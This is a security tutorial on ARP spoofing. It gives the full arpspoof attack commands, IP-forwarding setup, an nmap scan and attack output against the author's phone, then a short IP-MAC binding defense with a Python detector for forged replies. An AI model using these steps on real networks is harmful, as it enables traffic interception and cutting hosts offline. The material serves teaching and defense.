ARP Attacks and Spoofing in Practice
ARP (Address Resolution Protocol) sits at the network layer of the TCP/IP protocol stack and resolves an IP address to its corresponding MAC address.
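How ARP attacks work
An ARP attack forges the mapping between IP addresses and MAC addresses so that the network cannot communicate normally.
How ARP spoofing works
The spoofing source disguises itself as the gateway (or another host) and sends ARP reply packets to target hosts on the LAN, so that hosts on the LAN mistake the spoofing source's MAC address for the MAC address of the gateway (or the other host) and send the data originally bound for the gateway (or the other host) to the spoofing source instead.
Carrying out ARP spoofing
1. Install the arpspoof tool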
sudo apt-get install dsniff
Usage syntax
arpspoof [-i interface] [-c own|host|both] [-t target] [-r] host
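Parameters
-i interface Specifies the interface to use.
-c own|host|both Specifies the scope: own, host, or both.
-t target Specifies a particular host to ARP poison (if not specified, all hosts on the LAN).
-r Poisons both hosts (host and target) to capture traffic in both directions. (Only valid together with -t.)
host Specifies the host whose packets you want to intercept (usually the local gateway).
Example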
arpspoof -i eth0 -t 192.168.1.100 192.168.1.1
192.168.1.100 is the IP address of the attack target, and 192.168.1.1 is the target's gateway.
2. Enable IP forwarding
echo 1 > /proc/sys/net/ipv4/ip_forward
3. Check the attacking machine's IP address and ARP cache table
Check the IP address:
root@kali:/home/sknife# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.0.105 netmask 255.255.255.0 broadcast 192.168.0.255
inet6 fe80::20c:29ff:fe3f:1aea prefixlen 64 scopeid 0x20<link>
ether 00:0c:29:3f:1a:ea txqueuelen 1000 (Ethernet)
RX packets 161798 bytes 139527686 (133.0 MiB)
RX errors 0 dropped 10 overruns 0 frame 0
TX packets 66839 bytes 16672614 (15.9 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 229 bytes 12275 (11.9 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 229 bytes 12275 (11.9 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
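Note: the attacking machine's network connection is in bridged mode (it must be on the same LAN as the target machine).
Check the ARP cache table: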
root@kali:/home/sknife# arp
Address HWtype HWaddress Flags Mask Iface
192.168.0.101 ether e4:a7:c5:43:ab:b1 C eth0
192.168.0.103 ether e4:34:93:d3:7c:26 C eth0
192.168.0.104 ether 30:24:32:e7:df:a6 C eth0
192.168.0.100 ether dc:72:9b:de:36:ad C eth0
192.168.0.102 ether 68:27:37:40:70:ce C eth0
192.168.0.1 ether f4:83:cd:00:99:a7 C eth0
Note: 192.168.0.1 is the gateway; all the others are hosts.
4. Locate the target machine
Scan host 192.168.0.100 with nmap
root@kali:/home/sknife# nmap -O 192.168.0.100
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-30 17:54 CST
Nmap scan report for 192.168.0.100
Host is up (0.026s latency).
Not shown: 999 closed ports
PORT STATE SERVICE
16080/tcp filtered osxwebadmin
MAC Address: DC:72:9B:DE:36:AD (Huawei Technologies)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 4.04 seconds
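This shows that it is the author's Huawei phone.
Note: you can also find the IP address directly from the phone's status information.
5. Start the attack
Run the command on the attacking machine: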
root@kali:/home/sknife# arpspoof -i eth0 -t 192.168.0.100 192.168.0.1
0:c:29:3f:1a:ea dc:72:9b:de:36:ad 0806 42: arp reply 192.168.0.1 is-at 0:c:29:3f:1a:ea
0:c:29:3f:1a:ea dc:72:9b:de:36:ad 0806 42: arp reply 192.168.0.1 is-at 0:c:29:3f:1a:ea
0:c:29:3f:1a:ea dc:72:9b:de:36:ad 0806 42: arp reply 192.168.0.1 is-at 0:c:29:3f:1a:ea
0:c:29:3f:1a:ea dc:72:9b:de:36:ad 0806 42: arp reply 192.168.0.1 is-at 0:c:29:3f:1a:ea
0:c:29:3f:1a:ea dc:72:9b:de:36:ad 0806 42: arp reply 192.168.0.1 is-at 0:c:29:3f:1a:ea
0:c:29:3f:1a:ea dc:72:9b:de:36:ad 0806 42: arp reply 192.168.0.1 is-at 0:c:29:3f:1a:ea
0:c:29:3f:1a:ea dc:72:9b:de:36:ad 0806 42: arp reply 192.168.0.1 is-at 0:c:29:3f:1a:ea
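The output shows the attacking machine sending ARP reply packets to the target host, telling it that the gateway's MAC address is 00:0c:29:3f:1a:ea (the attacking host's MAC address). At this point the ARP spoofing has succeeded and the phone cannot get online.
Defending against ARP spoofing
Bind IP-MAC on the router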
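The same IP-MAC binding idea can be used for detection. The Python code below is an added example, not part of the original article: it checks ARP reply lines, in the format printed in step 5, against a pinned binding table built from the addresses shown in step 3. The names BINDINGS and find_binding_violations and the sample lines are assumptions made for this example.

```python
import re

# Known-good IP-to-MAC bindings, copied from the ifconfig and arp output above.
BINDINGS = {
    "192.168.0.1": "f4:83:cd:00:99:a7",    # gateway
    "192.168.0.100": "dc:72:9b:de:36:ad",  # phone
    "192.168.0.105": "00:0c:29:3f:1a:ea",  # Kali machine
}

MAC = r"(?:[0-9a-f]{1,2}:){5}[0-9a-f]{1,2}"
# Frame summary line in the format printed in step 5.
ARP_REPLY = re.compile(
    rf"^{MAC} {MAC} 0806 \d+: arp reply (?P<ip>\d+(?:\.\d+){{3}}) is-at (?P<mac>{MAC})$",
    re.IGNORECASE,
)

def normalize_mac(mac):
    """Zero-pad each octet so 0:c:29:3f:1a:ea compares equal to 00:0c:29:3f:1a:ea."""
    return ":".join(octet.zfill(2) for octet in mac.lower().split(":"))

def find_binding_violations(lines, bindings=BINDINGS):
    """Return one alert per (IP, claimed MAC) pair that contradicts the bindings."""
    pinned = {ip: normalize_mac(mac) for ip, mac in bindings.items()}
    owner_of = {mac: ip for ip, mac in pinned.items()}
    alerts = {}
    for line in lines:
        match = ARP_REPLY.match(line.strip())
        if not match or match["ip"] not in pinned:
            continue  # not an ARP reply, or an address with no binding
        ip, claimed = match["ip"], normalize_mac(match["mac"])
        if claimed == pinned[ip]:
            continue  # reply agrees with the binding
        alert = alerts.setdefault((ip, claimed), {
            "ip": ip, "expected": pinned[ip], "claimed": claimed,
            "claimed_mac_belongs_to": owner_of.get(claimed), "count": 0,
        })
        alert["count"] += 1
    return list(alerts.values())

# Constructed sample: one genuine gateway reply followed by two forged ones.
SAMPLE = """\
f4:83:cd:0:99:a7 dc:72:9b:de:36:ad 0806 42: arp reply 192.168.0.1 is-at f4:83:cd:0:99:a7
0:c:29:3f:1a:ea dc:72:9b:de:36:ad 0806 42: arp reply 192.168.0.1 is-at 0:c:29:3f:1a:ea
0:c:29:3f:1a:ea dc:72:9b:de:36:ad 0806 42: arp reply 192.168.0.1 is-at 0:c:29:3f:1a:ea
""".splitlines()

for alert in find_binding_violations(SAMPLE):
    print(alert)
```

The claimed_mac_belongs_to field names the pinned host whose MAC appears in the forged reply, which is the machine to investigate first.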
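Disclaimer
This article is intended only for study and discussion by network security enthusiasts; do not use it for illegal or criminal purposes.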